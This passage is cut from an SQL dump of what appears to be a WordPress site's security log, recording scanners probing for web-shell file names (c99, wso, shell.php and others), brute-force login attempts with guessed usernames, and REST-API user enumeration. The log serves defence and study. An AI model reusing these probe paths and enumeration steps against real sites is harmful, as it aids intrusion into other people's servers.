8.88.114',3258603634,'',0,1637925604.2181,55,'v4TshANmux8nS0EOtIw1DJMp','','19|0|0|0|ashbooks.co.uk/symlink.php'),('194.58.88.114',3258603634,'',0,1637925604.4638,55,'OtBgDaWseyN9r6KxcRPw8huG','','19|0|0|0|ashbooks.co.uk/ohayo.php'),('194.58.88.114',3258603634,'',0,1637925604.7228,55,'omNEDwgRZ0PVXezF5UbBjpJ2','','19|0|0|0|ashbooks.co.uk/100.php'),('194.58.88.114',3258603634,'',0,1637925604.9818,55,'Y41GQ8F7oevHun32sbyZKxz9','','19|0|0|0|ashbooks.co.uk/777.php'),('194.58.88.114',3258603634,'',0,1637925605.5312,55,'qrvNTCuVaORpBE0FYDS2K3tP','','19|0|0|0|ashbooks.co.uk/wp-content/wp-logins.php'),('194.58.88.114',3258603634,'',0,1637925606.0667,55,'op0j9AIFcfr5ClqEQu1RsvBh','','19|0|0|0|ashbooks.co.uk/1index.php'),('194.58.88.114',3258603634,'',0,1637925606.6207,55,'3pDOwSkjqztFJrlRoh6sdG5b','','19|0|0|0|ashbooks.co.uk/wp-wso.php'),('194.58.88.114',3258603634,'',0,1637925606.8753,55,'2EDQleW4PAF1GOU6tMHkK8Rg','','19|0|0|0|ashbooks.co.uk/2index.php'),('194.58.88.114',3258603634,'',0,1637925607.3878,55,'sRPVrCNT1nZjEAfdh5ew74Ko','','19|0|0|0|ashbooks.co.uk/wp-content/wp-admin.php'),('194.58.88.114',3258603634,'',0,1637925607.6506,55,'0QjO7WqUY2gRwSLKbpIH6s5X','','19|0|0|0|ashbooks.co.uk/wp-configer.php'),('194.58.88.114',3258603634,'',0,1637925607.9083,55,'kgYZcQsv2R3mrNiqbTJOaUWd','','19|0|0|0|ashbooks.co.uk/wp-admin.php'),('194.58.88.114',3258603634,'',0,1637925608.4158,55,'32BvQWZEfi14RVyMexJ6GdCU','','19|0|0|0|ashbooks.co.uk/mini.php'),('194.58.88.114',3258603634,'',0,1637925608.6829,55,'hFN9H2lJ0jYspGr48Mv3n5Zy','','19|0|0|0|ashbooks.co.uk/old-index.php'),('194.58.88.114',3258603634,'',0,1637925608.9378,55,'hcTDI1PHpuCabo6lZNtJweVY','','19|0|0|0|ashbooks.co.uk/doc.php'),('194.58.88.114',3258603634,'',0,1637925609.4677,55,'FWQJv8MAS4fwHkj6Dyg9htPN','','19|0|0|0|ashbooks.co.uk/ups.php'),('194.58.88.114',3258603634,'',0,1637925609.7252,55,'RSGclMQ9NwbHuvq7VE2tJpTf','','19|0|0|0|ashbooks.co.uk/shx.php'),('194.58.88.114',3258603634,'',0,1637925610.0018,55,'9Z6d5fRPJO3exYSB8krMKcXl','','19|0|0|0|ashbooks.co.uk/FoxWSO.php'),('194.58.88.114',3258603634,'',0,1637925610.5242,55,'zlLqnp1KHQdxADERM8Y6WXGt','','19|0|0|0|ashbooks.co.uk/x.php'),('194.58.88.114',3258603634,'',0,1637925610.7821,55,'V4fd7o0iSGgBAb6qRL8wa19D','','19|0|0|0|ashbooks.co.uk/cms.php'),('194.58.88.114',3258603634,'',0,1637925611.0424,55,'YjbPItRUeHWzQVM6OkFfrd3y','','19|0|0|0|ashbooks.co.uk/stindex.php'),('194.58.88.114',3258603634,'',0,1637925611.5647,55,'YEmjIuHZl8dfy0QFOog7iKRr','','19|0|0|0|ashbooks.co.uk/wp-uploads.php'),('194.58.88.114',3258603634,'',0,1637925611.8401,55,'XgERtPVKk4bGJZsTanHNc8Qv','','19|0|0|0|ashbooks.co.uk/autoload_classmap.php'),('194.58.88.114',3258603634,'',0,1637925612.3788,55,'wACkIdgaDjQt1c7bX0mOvSPx','','19|0|0|0|ashbooks.co.uk/Gel.php'),('194.58.88.114',3258603634,'',0,1637925612.6472,55,'tVu69QlThrN3GJ04WCd1MaAo','','19|0|0|0|ashbooks.co.uk/defau1t.php'),('194.58.88.114',3258603634,'',0,1637925612.9025,55,'pbXRIV5cZCti7h0wHl3BSeWY','','19|0|0|0|ashbooks.co.uk/0byte.php'),('194.58.88.114',3258603634,'',0,1637925613.4298,55,'r7ob5ivA9wS3euyckFBznYsP','','19|0|0|0|ashbooks.co.uk/wp.php'),('194.58.88.114',3258603634,'',0,1637925613.7066,55,'UGNZo60brf4Rjx7uBzS8VmDK','','19|0|0|0|ashbooks.co.uk/41.php'),('194.58.88.114',3258603634,'',0,1637925613.9802,55,'uMh2ClELyIOir9zaxcv4t6dX','','19|0|0|0|ashbooks.co.uk/media-admin.php'),('194.58.88.114',3258603634,'',0,1637925614.5412,55,'8jzdHGy56wJvbQXOf3NkWL0A','','19|0|0|0|ashbooks.co.uk/4price.php'),('194.58.88.114',3258603634,'',0,1637925614.8106,55,'fsPFt15kqy9AXnUa8xOYErIz','','19|0|0|0|ashbooks.co.uk/MARIJUANA.php'),('194.58.88.114',3258603634,'',0,1637925615.3550,55,'68XARHWhopc7P3xfULgzC5kF','','19|0|0|0|ashbooks.co.uk/f.php'),('194.58.88.114',3258603634,'',0,1637925615.6165,55,'xpXR3C64ro5Wa8QLFv2AhBcJ','','19|0|0|0|ashbooks.co.uk/.fk.php'),('194.58.88.114',3258603634,'',0,1637925615.8889,55,'dc1v6NZlK7Eqiwr3gXOHVSkY','','19|0|0|0|ashbooks.co.uk/wikindex.php'),('194.58.88.114',3258603634,'',0,1637925616.7344,55,'NVOIR21kxcbuivyFqK7pwr9g','','19|0|0|0|ashbooks.co.uk/xox.php'),('194.58.88.114',3258603634,'',0,1637925617.0057,55,'TO8X5CH1FgiWN7AIjLroPeEt','','19|0|0|0|ashbooks.co.uk/o.php'),('194.58.88.114',3258603634,'',0,1637925617.5303,55,'BNhRE25uds03LkH49yXIlDqO','','19|0|0|0|ashbooks.co.uk/new.php'),('194.58.88.114',3258603634,'',0,1637925617.7906,55,'wdOsjET65De1X4xyk378z0Iq','','19|0|0|0|ashbooks.co.uk/3index.php'),('194.58.88.114',3258603634,'',0,1637925618.3122,55,'pe8xfn5ArJ0akV1utwPjK3IE','','19|0|0|0|ashbooks.co.uk/sindex.php'),('194.58.88.114',3258603634,'',0,1637925618.6128,55,'WPJR73Y1DolThy6gdqwLAKHs','','19|0|0|0|ashbooks.co.uk/baindex.php'),('194.58.88.114',3258603634,'',0,1637925618.8766,55,'4x0dCHBPJv8RWhqOyKS6aGDT','','19|0|0|0|ashbooks.co.uk/new-index.php'),('194.58.88.114',3258603634,'',0,1637925619.4621,55,'cgzBiJVmY4dCGHRXPNAaKIuv','','19|0|0|0|ashbooks.co.uk/wi.php'),('194.58.88.114',3258603634,'',0,1637925619.7270,55,'1agb2oEe5vHl0IS98RWuDyBZ','','19|0|0|0|ashbooks.co.uk/XxX.php'),('194.58.88.114',3258603634,'',0,1637925619.9900,55,'lXAG4LnTyPtcSmpoN1V78UWe','','19|0|0|0|ashbooks.co.uk/mar.php'),('194.58.88.114',3258603634,'',0,1637925620.5335,55,'YvP3dog5LU4srGba6AJyNSmI','','19|0|0|0|ashbooks.co.uk/root.php'),('194.58.88.114',3258603634,'',0,1637925620.8012,55,'BpEykhCQujoarscZ8GS9tv0m','','19|0|0|0|ashbooks.co.uk/11index.php'),('194.58.88.114',3258603634,'',0,1637925621.3453,50,'WCmKnt07kNFbsrujcaOh4dTf','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('194.58.88.114',3258603634,'',0,1637925621.6122,55,'KTApbVsltjIGFZu8qc0n6ze5','','19|0|0|0|ashbooks.co.uk/nee.php'),('194.58.88.114',3258603634,'',0,1637925621.8938,55,'xnR7ovTtfVHOFNsPbyELMeBX','','19|0|0|0|ashbooks.co.uk/v.php'),('194.58.88.114',3258603634,'',0,1637925622.4484,55,'9oRUqiVatPpzDvnjuNW3MOCF','','19|0|0|0|ashbooks.co.uk/z.php'),('194.58.88.114',3258603634,'',0,1637925622.7258,55,'iRvHz3wUEe8dTaQ0DbKuLNgj','','19|0|0|0|ashbooks.co.uk/xx.php'),('194.58.88.114',3258603634,'',0,1637925623.0239,55,'AhlF4tdDSvYu3j1w7VLEM280','','19|0|0|0|ashbooks.co.uk/g.php'),('194.58.88.114',3258603634,'',0,1637925623.5522,55,'VsOHIcdTCkRM7hDUjJi3e5En','','19|0|0|0|ashbooks.co.uk/m.php'),('194.58.88.114',3258603634,'',0,1637925623.8341,55,'XJzmq75YGHt1IQN6yiVP0hr9','','19|0|0|0|ashbooks.co.uk/shell.php'),('194.58.88.114',3258603634,'',0,1637925624.4231,55,'8nbpOdGcwWeS9BkotiNXgsvm','','19|0|0|0|ashbooks.co.uk/sh3ll.php'),('194.58.88.114',3258603634,'',0,1637925624.6985,55,'flE0Cc3ynMrbVF1dYiWALXg7','','19|0|0|0|ashbooks.co.uk/c99.php'),('194.58.88.114',3258603634,'',0,1637925624.9825,55,'Spy5BdKOlNuVn9LUPCcoIvWX','','19|0|0|0|ashbooks.co.uk/alexuse.php'),('194.58.88.114',3258603634,'',0,1637925625.5297,55,'XizCpxhcoD9V4aSNMKF6fE5l','','19|0|0|0|ashbooks.co.uk/w.php'),('194.58.88.114',3258603634,'',0,1637925625.8235,55,'U4z9BlWh6qjydGxcupeQw7C0','','19|0|0|0|ashbooks.co.uk/ws.php'),('194.58.88.114',3258603634,'',0,1637925626.3556,55,'0pxHUWFLSac1CeI3VfOKqPnr','','19|0|0|0|ashbooks.co.uk/2.php'),('194.58.88.114',3258603634,'',0,1637925626.6099,55,'K7bhQs6evlzj81fuoStryGXx','','19|0|0|0|ashbooks.co.uk/lol.php'),('194.58.88.114',3258603634,'',0,1637925626.9028,55,'G0v9eqi4ow2XKsbOHrYFZUJN','','19|0|0|0|ashbooks.co.uk/87.php'),('194.58.88.114',3258603634,'',0,1637925627.4473,55,'xWerV7F18AdQ5NIwMvBXUzb6','','19|0|0|0|ashbooks.co.uk/7yn.php'),('194.58.88.114',3258603634,'',0,1637925627.9075,55,'LkE78vJBiZyMUe9dgajq0VTQ','','19|0|0|0|ashbooks.co.uk/haxor.php'),('194.58.88.114',3258603634,'',0,1637925629.3626,55,'OsA3rnZw4PN28uLeqHmIxFSJ','','19|0|0|0|ashbooks.co.uk/403.php'),('194.58.88.114',3258603634,'',0,1637925629.6152,55,'D8lEkraJIMS6FUmyWsXiNYvG','','19|0|0|0|ashbooks.co.uk/13.php'),('194.58.88.114',3258603634,'',0,1637925629.8825,55,'OpgKcENPd0ytCf2Q59X8z6nZ','','19|0|0|0|ashbooks.co.uk/cpanel.php'),('5.188.62.140',96222860,'fabian',0,1637926526.7671,51,'lYU1PrwaEqIhHoAZsQpzcu78','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.241.15.39',804327207,'admin',0,1637930505.2651,7,'ncWbYhqTl364uNtPVkIiLOwf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('91.176.123.228',1538292708,'ashbooks',0,1637930755.4903,51,'5XKN1jd7xkZ6JBsMSvCfDmWQ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'marcel',0,1637930892.0929,51,'ALP5NyWKMErq4ubUZJwgVpeB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('124.122.186.225',2088418017,'ashbooks',0,1637930935.1311,51,'uVDaK1wbc0QMmEzrBisL7JTY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('27.116.16.118',460591222,'ashbooks',0,1637930938.5309,51,'5bEiFCUzcBlvhGW1Nrk7soJS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('189.56.190.63',3174612543,'ashbooks',0,1637931099.6549,51,'8ahxtd07RZVUnryKJYSEm5gC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.194.243.190',1740829630,'ashbooks',0,1637931118.7068,51,'M2arqFO6ZSwuDWYjvJB5RkHC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('76.22.195.157',1276560285,'ashbooks',0,1637931136.8924,51,'9DKUIFGZpizqvwBTAan2YN6r','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.35',1805007139,'admin',0,1637932552.5564,7,'vxLTuEX0Z8bpGKawBigPzIRY','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('134.209.231.225',2261903329,'admin',0,1637933250.6032,7,'YgfNQhvbJxLXDMlWREcCBZj8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('47.241.15.39',804327207,'admin',0,1637934428.7215,7,'Y4cUozhVQx5SXv1GnguCya26','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'kevin',0,1637935244.9055,51,'WtaL1xvbp7KNjqM5Drn8hoTl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('116.255.160.108',1962909804,'admin',0,1637935719.4252,7,'Zxhy43amF1Ck2reDvic5W0zN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.14.4',2160528900,'admin',0,1637936881.5202,7,'LwfHSKWr8nRUjsXBicIh4D3F','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('163.178.170.141',2746395277,'admin',0,1637938950.3794,7,'FS3WdhQmTGzqJnXLE5fisoM0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'jan',0,1637939587.0095,51,'9Bl4t2afnOLusMzA3Fm7PDgj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.103.199.115',3110586227,'',0,1637939694.4441,55,'l10aNwrjiDveyBbL4tUGoupV','','19|0|0|0|ashbooks.co.uk/wp-class.php'),('185.103.199.252',3110586364,'',0,1637939694.9635,55,'WulqNYjz0QXBnky81T9oE4tZ','','19|0|0|0|ashbooks.co.uk/wp-includes/wp-class.php'),('185.103.199.119',3110586231,'',0,1637939695.9655,55,'JCydIZVLRicetYxsUvqHb27W','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('185.103.199.196',3110586308,'',0,1637939697.0401,55,'JDcwBdTmUe7kqvW9ZlN2Sftr','','19|0|0|0|ashbooks.co.uk/css/index.php'),('185.103.199.253',3110586365,'',0,1637939698.0851,55,'KvO0lyPDaNCef9XFWYbmrGi3','','19|0|0|0|ashbooks.co.uk/wp-content/themes/sketch/404.php'),('198.52.97.144',3325321616,'admin',0,1637941162.2128,7,'IajpXgxFizrK9dqnQNAG8oRl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.90.80.180',2639941812,'admin',0,1637943471.0934,7,'QPd6wJRTnDokZuqXzjV2iGfp','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'david',0,1637943927.0555,51,'6w09LCbrXY3UeulFMRvgZkDt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('181.174.125.214',3048111574,'admin',0,1637944584.3630,7,'F86aTjM5xOISVlsh14AnDPKY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.224.119',1168367735,'admin',0,1637945653.0842,7,'t3BJjNX4Y59GQElZPupw1dMf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.86.118.101',2807461477,'admin',0,1637946947.0497,7,'2mZWAwvPySKtEsdcp1gRu0L6','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.31.175.188',3105861564,'admin',0,1637947319.8282,7,'XuGkjc8V29JfnRzSyr7KTYFC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.151.91',2813106011,'admin',0,1637948023.3312,7,'Ol3I4uhaDJwqvsQTpXUKjt7e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'tom',0,1637948270.5534,51,'YGgyr6ATax2314NHtzieu7KJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.26',1159655450,'admin',0,1637948597.8371,7,'tK40kVBRY7QZvxszWD1OnS5T','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('52.183.137.156',884443548,'admin',0,1637949095.1632,7,'796rGUheExTLDwP01va4nqO3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.228.109.147',400846227,'',0,1637950783.1463,55,'sVPcQeX5qv8Bo9x2lI63G0tT','','19|0|0|0|ashbooks.co.uk/ofc/php-ofc-library/ofc_upload_image.php'),('196.244.192.38',3304374310,'',0,1637952351.9241,70,'NZbJBisROelK4WuS0Mv6oc72','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('5.188.62.140',96222860,'markus',0,1637952609.3508,51,'7EskIYqtF2PCh0My4ZAxg9Bl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('148.66.129.233',2487386601,'admin',0,1637952980.6902,7,'DpMwCkuySJ9YFv32ArZ4Oc7z','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.158.15.146',765333394,'',0,1637954769.0201,55,'VGoDwfsp94FtnbLxWgYRduH3','','19|0|0|0|ashbooks.co.uk/wp-content/hbhbrdryld.php'),('62.178.170.93',1051896413,'admin',0,1637955474.1281,7,'hxmIuF7dRZp6Yn5SKjwi38Ca','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('78.141.204.157',1317915805,'admin',0,1637956636.7827,7,'L6SqAb29U84f5NrVDjyonI30','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'sebastian',0,1637956949.6042,51,'GTY3ExNS72hjLRosu0VWB4X8','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('176.9.91.103',2953403239,'admin',0,1637957950.9334,7,'ebXZq5wDfxzL1aoUcHuFlvmy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('187.51.127.28',3140714268,'admin',0,1637959049.9946,7,'M2poAjwqv67dnGimf1CSRsQT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.141',757638797,'admin',0,1637960113.5661,7,'O7GmZ2A5dyf1UYvoPpM8rJNt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'julian',0,1637961287.8420,51,'eNXdf6kbn3YajmMVT2g5WJvI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.141',757638797,'admin',0,1637961383.3390,7,'GkLu9Q3c70EVD5P2BUW6ObYn','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.71.143.226',575115234,'',0,1637961714.5519,70,'mlr1LtxNMGWVQaDH5ESb82z9','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('34.71.143.226',575115234,'editor',0,1637961717.1994,51,'2rtUS9ad0ZnO8GeCfclLsKk6','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('148.72.214.245',2487801589,'admin',0,1637963427.6603,7,'qeVCnFNwUH0AEjKzsvrTMI6G','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('63.141.252.69',1066269765,'admin',0,1637963812.4921,7,'iwgoUyDMKtc26h9VPOeFuZW8','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('197.5.152.234',3305478378,'',0,1637964073.0648,70,'d8pMf0owFGKtkONIQArxln97','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('167.172.190.95',2813115999,'admin',0,1637964659.4586,7,'kuCAyHOZQXmpVzfrWUFclaET','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'leon',0,1637965633.9632,51,'mReqwh2O8Z4f5ruAdYt7LIlc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.65.238.248',2671898360,'admin',0,1637965880.9293,7,'Sxn6KVQbBJu4srkYU78TROeo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.217.209',2650134993,'admin',0,1637968233.4119,7,'7YZSKikOFmHA9EpvhsLRXP4U','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.64.54.158',759183006,'admin',0,1637969313.4464,7,'y32VNngfYrOcBhvFeRKWH6Gs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'christoph',0,1637970001.2961,51,'5H0bharqIRgC2OTKSQ6BVGMw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('164.68.99.94',2755945310,'admin',0,1637970392.2016,7,'Jx42XYSpCZBt5mEdq3DGbuUP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.248.47',2319775791,'admin',0,1637971438.1051,7,'fMWisruE1welONqx9Q4DyRYm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.220.101.32',3118228768,'ashbooks',0,1637972241.7745,51,'I8KW1dX0iwyTPGQjFSBfMJYo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.65.238.248',2671898360,'admin',0,1637972535.1702,7,'5uJp9BnUQDodrZ4ATzecbmSk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1637973570.9404,7,'XEJtBPhc7gbZxzASlN3D0IHK','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'simon',0,1637974363.9649,51,'qjxEuV4MkNh0cQvLbWIA7yZl','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('95.217.3.203',1608057803,'admin',0,1637974687.0061,7,'4ZDIWQOvwtRK2BbmLp1FUAi7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('159.65.146.8',2671874568,'admin',0,1637975825.6260,7,'YmiBEs0nOwJz9KxNfUelay2A','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('193.148.164.26',3247744026,'admin',0,1637976822.8399,7,'6cE7X39oLnpiehYDqdtQmIrj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('119.8.119.224',1997043680,'admin',0,1637977869.2860,7,'HS0NBzgPhsAGEVQ8O34UiFne','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'felix',0,1637978704.2194,51,'Gd2zImOpao7qstXTSgYbyVZ0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.132.196.5',3699688453,'admin',0,1637978961.4660,7,'ZqG6fDbi9VOzSNeT7r0c5Khs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.182.159.89',1052155737,'',0,1637979792.9795,55,'b4ziuWSMsaN7FH0k8AdhD3px','','19|0|0|0|ashbooks.co.uk/wp-includes/wp-class.php'),('81.88.52.163',1364735139,'admin',0,1637980056.3561,7,'nApzN4hXWPeJSaljb0uBVZO7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('156.38.216.210',2619791570,'admin',0,1637981064.2931,7,'q5IaJNODyjihBwz6LxngXWdE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'andreas',0,1637983065.9334,51,'ZnvN61XWxyLtMrwP9mD2p47z','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('65.108.51.66',1097610050,'admin',0,1637983169.6094,7,'RW16p25qZQsjXL4AMHmKO9zF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('137.184.13.134',2310540678,'admin',0,1637984150.2986,7,'qhw80jpbLAoBc2CiGJ9IuVTs','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.44',3103917100,'admin',0,1637985114.5083,7,'xTSwPBUGJAHi1DOplNYLkyCI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.168.97.89',1839751513,'admin',0,1637986215.1974,7,'ZNe2pC68KbrTyMOdGU3FiahD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('93.113.111.54',1567715126,'admin',0,1637987186.5463,7,'CThrypXOQYvsMKlkRLmJ7qGd','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'nils',0,1637987431.6840,51,'cjaTLqJAMzEHxXpBiS1sRdU7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('78.47.116.216',1311732952,'admin',0,1637988219.1504,7,'p1raE36YUgc0vZwtNb2CHsSf','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.163.133.151',3265496471,'admin',0,1637989259.6894,7,'iLcbymY7s4Q9K8uWExjdJoU2','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.11.6',1137511174,'admin',0,1637990490.7469,7,'fmxkCKpuXbsMWwYaRdOcJ5vP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('27.65.40.197',457255109,'admin',0,1637991596.9181,7,'0MlP2dHJYkrDW3jyazIUqSoi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'nico',0,1637991773.0377,51,'WplsDv2ZRIA0ENqkhmiYSwdy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.192.241.6',3569414406,'',0,1637992505.0965,55,'lFnXZIN165Vuh2aYRebzBDWj','','19|0|0|0|ashbooks.co.uk/emergency.php'),('212.192.241.6',3569414406,'',0,1637992576.5356,55,'UCGRMI6157sdPF4axfThJelK','','19|0|0|0|ashbooks.co.uk/wp-content/themes/wp-update.php'),('220.167.101.24',3701957912,'admin',0,1637992597.4653,7,'bqXm8fOSKl7sgCivaUQ3hzuF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.231.155',1159653275,'admin',0,1637992745.8000,7,'UHBKCsW78ck1QmNYzSAjeGu5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.2.4.71',3103917127,'admin',0,1637994702.9509,7,'R0ZFhA3eHsBNtSEVzCbrTnxw','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('143.198.162.183',2412159671,'admin',0,1637995655.1991,7,'O5CbkVvWnX9lMx1RmjYuZyBt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'martin',0,1637996127.5550,51,'QGblviWsktYJEn78F5CDu6od','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('188.166.56.218',3165010138,'admin',0,1637996643.2573,7,'34bPnSTYhWH8oIUCgvLDOFJt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('128.199.190.211',2160574163,'admin',0,1637997710.4236,7,'QW2jStuM5af9g8ozwEHdBn7e','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'max',0,1638000472.2406,51,'am1WlZV9JpoDFxtA8407YLOC','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'florian',0,1638004804.7618,51,'yN6WnZm0vjwLp3BaxzQeTUK9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('106.51.242.201',1781789385,'',0,1638009234.7381,70,'uUZJ2s7FlDd8WgzEMYqpmtBA','','0|0|0|0|ashbooks.co.uk/index.php/wp-json/wp/v2/users'),('173.208.152.235',2916129003,'admin',0,1638011130.7354,7,'mvEWzjAHltw632K9MJ4incNY','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('185.81.157.200',3109133768,'',0,1638012499.9499,55,'0LYzfwuy5iEoGRAId7M6hBcJ','','19|0|0|0|ashbooks.co.uk/virtual-teams-how-to-sustain-high-performing-teams-in-the-virtual-workplace/dup-installer/main.installer.php'),('185.67.34.1',3108184577,'',0,1638013101.9225,55,'qGerdiSx4pJy385sIQFb7aE1','','19|0|0|0|ashbooks.co.uk/restapi.php'),('185.67.34.1',3108184577,'',0,1638013108.7686,55,'TkgEhmW8QjORDGrI0iwXzaUu','','19|0|0|0|ashbooks.co.uk/gate.php'),('185.67.34.1',3108184577,'',0,1638013110.0900,55,'oBae48Xqmt1AsSH2UrOCPZ3L','','19|0|0|0|www.ashbooks.co.uk/restapi.php'),('185.67.34.1',3108184577,'',0,1638013112.0573,55,'LSEkvAM2wJpIa6cUObeX8gxK','','19|0|0|0|www.ashbooks.co.uk/gate.php'),('157.245.156.140',2650119308,'',0,1638013907.0700,70,'6CDvdqciZ1RTrEXjI3PeSszl','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('35.225.94.95',601972319,'',0,1638014311.4838,70,'irLuYAhMzQaBWjScnwqs5VEg','','0|0|0|0|www.ashbooks.co.uk/wp-json/wp/v2/users/'),('185.81.157.200',3109133768,'',0,1638032189.7058,55,'0G34xVBCuzhfP15tAqTsevWS','','19|0|0|0|ashbooks.co.uk/dup-installer/main.installer.php'),('107.150.48.235',1805005035,'admin',0,1638033580.7149,7,'6h3GBf2DYVsjHOJWpSI1t97z','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('69.30.225.182',1159651766,'admin',0,1638035194.2719,7,'9hfrmNMePTxUco7wnKC4zIRZ','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'admin',0,1638036360.3535,7,'MG4P8kxBRzf629itbswgYdQF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'info',0,1638036363.4672,51,'sQIOZHknex0F6tMj7wCBAEzX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'user',0,1638036365.9403,51,'YeBR71aromDibZMc2HUpPTz5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'root',0,1638036368.5130,51,'ImyvfK7uzGVtlB4HkXCMFaoJ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'info@ashbooks.co.uk',0,1638036370.9805,51,'IbKdckF9JNuHto1ZgwzlBeqD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'',0,1638036371.0029,10,'IbKdckF9JNuHto1ZgwzlBeqD','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'',0,1638036374.6095,50,'NP6zV91THGc0pto5wnxsKgua','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('220.92.136.66',3697051714,'',0,1638036376.9485,50,'N24iQs69WFwpcqoSZzfhGPl7','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('69.12.66.204',1158431436,'',0,1638038611.3243,70,'zdHRutre1N3WwiGKonP5XVvT','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('5.188.62.76',96222796,'ashbooks',0,1638039434.7411,5